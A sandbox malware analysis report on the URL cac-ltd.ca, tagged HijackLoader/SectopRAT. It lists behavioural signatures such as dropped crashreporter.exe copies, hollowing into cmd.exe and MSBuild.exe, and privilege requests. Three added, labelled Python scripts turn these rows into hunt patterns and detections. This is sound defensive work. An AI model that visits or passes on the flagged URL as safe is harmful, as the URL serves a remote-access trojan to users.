Malware Analysis Report

2025-04-14 08:02

Sample ID 250312-2l6leaxkv6
Target http://cac-ltd.ca/
Tags
hijackloader sectoprat discovery execution loader rat trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

Threat Level: Known bad

The submitted target http://cac-ltd.ca/ (a URL, detonated in Microsoft Edge) was found to be: Known bad.

Malicious Activity Summary

hijackloader sectoprat discovery execution loader rat trojan

Hijackloader family

SectopRAT payload

Sectoprat family

SectopRAT

HijackLoader

Command and Scripting Interpreter: PowerShell

Blocklisted process makes network request

Executes dropped EXE

Loads dropped DLL

Enumerates connected drives

Drops file in System32 directory

Suspicious use of SetThreadContext

System Location Discovery: System Language Discovery

Enumerates physical storage devices

Browser Information Discovery

Suspicious use of FindShellTrayWindow

Enumerates system info in registry

Modifies registry class

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: MapViewOfSection

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious use of SendNotifyMessage

Suspicious use of SetWindowsHookEx

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2025-03-12 22:41

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2025-03-12 22:41

Reported

2025-03-12 22:46

Platform

win10v2004-20250217-en

Max time kernel

293s

Max time network

294s

Command Line

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument http://cac-ltd.ca/

Signatures

HijackLoader

loader hijackloader

Hijackloader family

hijackloader

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A

Sectoprat family

sectoprat

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\{7F2CC590-1D6D-49CF-B4E6-F2CAEDC92721}\crashreporter.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\{7F2CC590-1D6D-49CF-B4E6-F2CAEDC92721}\crashreporter.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\{7F2CC590-1D6D-49CF-B4E6-F2CAEDC92721}\crashreporter.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\{7F2CC590-1D6D-49CF-B4E6-F2CAEDC92721}\crashreporter.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\{7F2CC590-1D6D-49CF-B4E6-F2CAEDC92721}\crashreporter.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\{7F2CC590-1D6D-49CF-B4E6-F2CAEDC92721}\crashreporter.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\{7F2CC590-1D6D-49CF-B4E6-F2CAEDC92721}\crashreporter.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\{7F2CC590-1D6D-49CF-B4E6-F2CAEDC92721}\crashreporter.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\{7F2CC590-1D6D-49CF-B4E6-F2CAEDC92721}\crashreporter.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\{7F2CC590-1D6D-49CF-B4E6-F2CAEDC92721}\crashreporter.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\serviceBackup\crashreporter.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\serviceBackup\crashreporter.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\serviceBackup\crashreporter.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\serviceBackup\crashreporter.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\serviceBackup\crashreporter.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\serviceBackup\crashreporter.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\serviceBackup\crashreporter.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\serviceBackup\crashreporter.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\serviceBackup\crashreporter.exe N/A
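
Added example (not part of the sandbox report): the two crashreporter.exe locations above are specific to this detonation (sandbox user Admin, one per-run GUID directory under Temp), so they cannot be pasted into a hunt as-is. This Python script rewrites the Process column of the "Loads dropped DLL" rows into environment-relative patterns, collapses the repeated rows into one entry per location with its load count, and marks the user-writable locations as the ones worth hunting; MsiExec.exe (the Windows Installer engine loading a dropped custom-action DLL) is kept as context. The %APPDATA%/%LOCALAPPDATA% mapping assumes the default Windows profile layout, and which of the two copies is the persisted one is an assumption, since the report's Files section is not on this page.

```python
import re

# Constructed sample: the "Process" column of the "Loads dropped DLL" rows in this
# report, repeated with the same per-process counts the report shows (5 / 10 / 9).
LOADS_DROPPED_DLL_PROCESSES = (
    [r"C:\Windows\syswow64\MsiExec.exe"] * 5
    + [r"C:\Users\Admin\AppData\Local\Temp\{7F2CC590-1D6D-49CF-B4E6-F2CAEDC92721}\crashreporter.exe"] * 10
    + [r"C:\Users\Admin\AppData\Roaming\serviceBackup\crashreporter.exe"] * 9
)

# Sandbox-specific prefixes -> environment-relative form. Order matters: the more
# specific AppData prefixes must be tried before the bare user-profile prefix.
# (Assumes the default profile layout; %LOCALAPPDATA%\Temp is the default user TEMP.)
_ENV_PREFIXES = [
    (re.compile(r"^[A-Za-z]:\\Users\\[^\\]+\\AppData\\Roaming", re.I), "%APPDATA%"),
    (re.compile(r"^[A-Za-z]:\\Users\\[^\\]+\\AppData\\Local", re.I), "%LOCALAPPDATA%"),
    (re.compile(r"^[A-Za-z]:\\Users\\[^\\]+", re.I), "%USERPROFILE%"),
    (re.compile(r"^[A-Za-z]:\\Windows", re.I), "%SystemRoot%"),
]
# A per-run GUID directory name such as the Temp one in this report; replaced by a
# glob so the pattern matches any run, not just this detonation.
_GUID_DIR = re.compile(r"\{[0-9A-Fa-f]{8}(?:-[0-9A-Fa-f]{4}){3}-[0-9A-Fa-f]{12}\}")
_USER_WRITABLE = ("%APPDATA%", "%LOCALAPPDATA%", "%USERPROFILE%")


def normalize_path(path: str) -> str:
    """Rewrite a sandbox path into an environment-relative hunt pattern."""
    for prefix, env in _ENV_PREFIXES:
        if prefix.match(path):
            path = prefix.sub(env, path, count=1)
            break
    return _GUID_DIR.sub("{*}", path)


def is_user_writable(normalized: str) -> bool:
    """True for locations an unprivileged user can write to (staging/persistence)."""
    return normalized.upper().startswith(_USER_WRITABLE)


def triage(process_paths):
    """Collapse the report rows into one IOC per location, user-writable first."""
    counts = {}
    for raw in process_paths:
        ioc = normalize_path(raw)
        counts[ioc] = counts.get(ioc, 0) + 1
    iocs = [
        {"ioc": ioc, "user_writable": is_user_writable(ioc), "dll_loads": n}
        for ioc, n in counts.items()
    ]
    # User-writable locations are the ones to hunt for; a system binary that merely
    # loaded a dropped DLL (here MsiExec.exe) is context, not an IOC.
    iocs.sort(key=lambda i: (not i["user_writable"], i["ioc"]))
    return iocs


if __name__ == "__main__":
    for entry in triage(LOADS_DROPPED_DLL_PROCESSES):
        flag = "HUNT" if entry["user_writable"] else "ctx "
        print(f"{flag} {entry['dll_loads']:3d}  {entry['ioc']}")
```

The resulting patterns (`%APPDATA%\serviceBackup\crashreporter.exe`, `%LOCALAPPDATA%\Temp\{*}\crashreporter.exe`) can be expanded per user profile on an endpoint; the `{*}` glob is what makes the Temp pattern survive the per-run GUID.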

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\A: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\%AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4044 set thread context of 3448 N/A C:\Users\Admin\AppData\Roaming\serviceBackup\crashreporter.exe C:\Windows\SysWOW64\cmd.exe
PID 3448 set thread context of 2596 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
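
Added example (not part of the sandbox report): the two rows above describe a two-hop chain, crashreporter.exe (PID 4044) setting the thread context of cmd.exe (PID 3448), which in turn does the same to MSBuild.exe (PID 2596). The "Suspicious use of WriteProcessMemory" section below holds only msedge.exe parent-to-child rows, while "Suspicious behavior: MapViewOfSection" lists crashreporter.exe and cmd.exe; that is consistent with the payload being mapped into the target as a section rather than written with WriteProcessMemory, so a detection keyed on WriteProcessMemory alone would miss this chain. The Python script below parses rows in the report's layout, reconstructs the chain, and flags it when the origin lives under a user-writable directory and the victims are well-known hollowing hosts; the host list is a heuristic assumption of this example, not something the report states.

```python
import ntpath
import re
from collections import defaultdict, namedtuple

# Constructed sample: the two "Suspicious use of SetThreadContext" rows above,
# verbatim, in the report's "Description Indicator Process Target" layout.
SET_THREAD_CONTEXT_ROWS = [
    r"PID 4044 set thread context of 3448 N/A C:\Users\Admin\AppData\Roaming\serviceBackup\crashreporter.exe C:\Windows\SysWOW64\cmd.exe",
    r"PID 3448 set thread context of 2596 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe",
]

Edge = namedtuple("Edge", "src_pid src_image dst_pid dst_image")

# The two image paths are separated only by a space and may themselves contain
# spaces ("Program Files (x86)"), so split on the start of the second drive-letter
# path rather than on whitespace.
_ROW = re.compile(r"^PID (\d+) set thread context of (\d+) N/A (.+?) ([A-Za-z]:\\.+)$")

# Microsoft-signed hosts routinely hollowed to run a payload under a trusted image
# name (heuristic list; an assumption of this example).
HOLLOW_HOSTS = {
    "cmd.exe", "msbuild.exe", "regasm.exe", "regsvcs.exe",
    "installutil.exe", "applaunch.exe", "aspnet_compiler.exe",
}


def parse_rows(rows):
    """Turn SetThreadContext rows into source -> target edges; skip malformed rows."""
    edges = []
    for row in rows:
        m = _ROW.match(row.strip())
        if m:
            edges.append(Edge(int(m[1]), m[3], int(m[2]), m[4]))
    return edges


def build_chains(edges):
    """Follow src -> dst edges from each root (a PID nobody targeted) to a leaf."""
    image, children, targets = {}, defaultdict(list), set()
    for e in edges:
        image[e.src_pid], image[e.dst_pid] = e.src_image, e.dst_image
        children[e.src_pid].append(e.dst_pid)
        targets.add(e.dst_pid)

    def walk(pid, prefix):
        path = prefix + [(pid, image[pid])]
        seen = {p for p, _ in path}                       # cycle guard
        kids = [c for c in children.get(pid, []) if c not in seen]
        if not kids:
            return [path]
        return [p for c in kids for p in walk(c, path)]

    roots = [pid for pid in image if pid not in targets and pid in children]
    return [chain for root in roots for chain in walk(root, [])]


def assess(chain):
    """Flag a chain whose origin is in a user-writable directory and whose
    victims are known hollowing hosts."""
    origin = chain[0][1]
    user_writable_origin = re.search(r"\\(Users|ProgramData)\\", origin, re.I) is not None
    hollowed = [
        ntpath.basename(img) for _, img in chain[1:]
        if ntpath.basename(img).lower() in HOLLOW_HOSTS
    ]
    return {
        "origin": origin,
        "user_writable_origin": user_writable_origin,
        "hollowed_hosts": hollowed,
        "suspicious": user_writable_origin and bool(hollowed),
    }


if __name__ == "__main__":
    for chain in build_chains(parse_rows(SET_THREAD_CONTEXT_ROWS)):
        print(" -> ".join(f"{ntpath.basename(img)}({pid})" for pid, img in chain))
        print(assess(chain))
```

For this report the script yields one chain, crashreporter.exe(4044) -> cmd.exe(3448) -> MSBuild.exe(2596), flagged as suspicious; the same parser applies unchanged to any other report in this layout, including branching chains where one source hollows several targets.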

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\serviceBackup\crashreporter.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\syswow64\MsiExec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\{7F2CC590-1D6D-49CF-B4E6-F2CAEDC92721}\crashreporter.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\{7F2CC590-1D6D-49CF-B4E6-F2CAEDC92721}\crashreporter.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\serviceBackup\crashreporter.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\serviceBackup\crashreporter.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\serviceBackup\crashreporter.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\serviceBackup\crashreporter.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeImpersonatePrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeImpersonatePrivilege N/A C:\Windows\System32\msiexec.exe N/A
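
Added example (not part of the sandbox report): most rows above are msiexec.exe asking for privileges such as SeTcbPrivilege and SeCreateTokenPrivilege, which only a SYSTEM/service token holds by default; that identifies the Windows Installer service instance enabling its full privilege set, which is installer noise in the same way the A: to Z: sweep under "Enumerates connected drives" is (Windows Installer enumerates volumes when it computes disk cost). The rows worth correlating with the PowerShell command line (not on this page) are powershell.exe requesting SeDebugPrivilege. Two caveats: each row records a call to AdjustTokenPrivileges, and that call reports success with ERROR_NOT_ALL_ASSIGNED when the token lacks the privilege, so a row shows what was requested, not what was held; and the report mixes System32/system32 casing for msiexec.exe, so group case-insensitively. The Python script below applies that reading to a constructed subset of the rows; the privilege classification sets are an assumption of this example.

```python
import re
from collections import defaultdict

# Constructed sample: a representative subset of the "Suspicious use of
# AdjustPrivilegeToken" rows above, in the report's layout.
ADJUST_PRIVILEGE_ROWS = [
    r"Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A",
    r"Token: SeShutdownPrivilege N/A C:\Windows\System32\msiexec.exe N/A",
    r"Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\msiexec.exe N/A",
    r"Token: SeCreateTokenPrivilege N/A C:\Windows\System32\msiexec.exe N/A",
    r"Token: SeTcbPrivilege N/A C:\Windows\system32\msiexec.exe N/A",
    r"Token: SeDebugPrivilege N/A C:\Windows\System32\msiexec.exe N/A",
    r"Token: SeImpersonatePrivilege N/A C:\Windows\System32\msiexec.exe N/A",
]

_ROW = re.compile(r"^Token: (Se\w+Privilege) N/A (.+?) N/A$")

# Privileges only SYSTEM (and some service accounts) hold by default; a process
# requesting them is running under a service token, not an interactive user.
# (Classification sets are an assumption of this example.)
SYSTEM_ONLY = {"SeTcbPrivilege", "SeCreateTokenPrivilege", "SeLockMemoryPrivilege"}
# Privileges that let a process read or tamper with other processes or the OS.
SENSITIVE = {
    "SeDebugPrivilege", "SeTcbPrivilege", "SeImpersonatePrivilege",
    "SeLoadDriverPrivilege", "SeBackupPrivilege", "SeRestorePrivilege",
    "SeTakeOwnershipPrivilege", "SeCreateTokenPrivilege", "SeAssignPrimaryTokenPrivilege",
}


def privileges_by_process(rows):
    """Group requested privileges by image path (case-insensitive), first-seen order."""
    by_proc = defaultdict(list)
    for row in rows:
        m = _ROW.match(row.strip())
        if m:
            image = m[2].lower()            # report mixes System32/system32 casing
            if m[1] not in by_proc[image]:
                by_proc[image].append(m[1])
    return dict(by_proc)


def assess(rows):
    """Per process: how many privileges were requested, the sensitive ones, whether
    the request set implies a service token, and whether SeDebugPrivilege from a
    user-context process makes the row worth correlating."""
    report = {}
    for image, privs in privileges_by_process(rows).items():
        requested = set(privs)
        service_token = bool(requested & SYSTEM_ONLY)
        report[image] = {
            "requested": len(requested),
            "sensitive": sorted(requested & SENSITIVE),
            "service_token": service_token,
            # A service enabling its whole set (Windows Installer here) is expected;
            # SeDebugPrivilege from an interactive process is the row to correlate.
            "notable": "SeDebugPrivilege" in requested and not service_token,
        }
    return report


if __name__ == "__main__":
    for image, info in assess(ADJUST_PRIVILEGE_ROWS).items():
        print(("NOTABLE " if info["notable"] else "        ") + image, info)
```

Run against the full row list above, the same logic collapses the roughly sixty msiexec.exe rows into one service-token entry and leaves powershell.exe as the only notable process.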

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
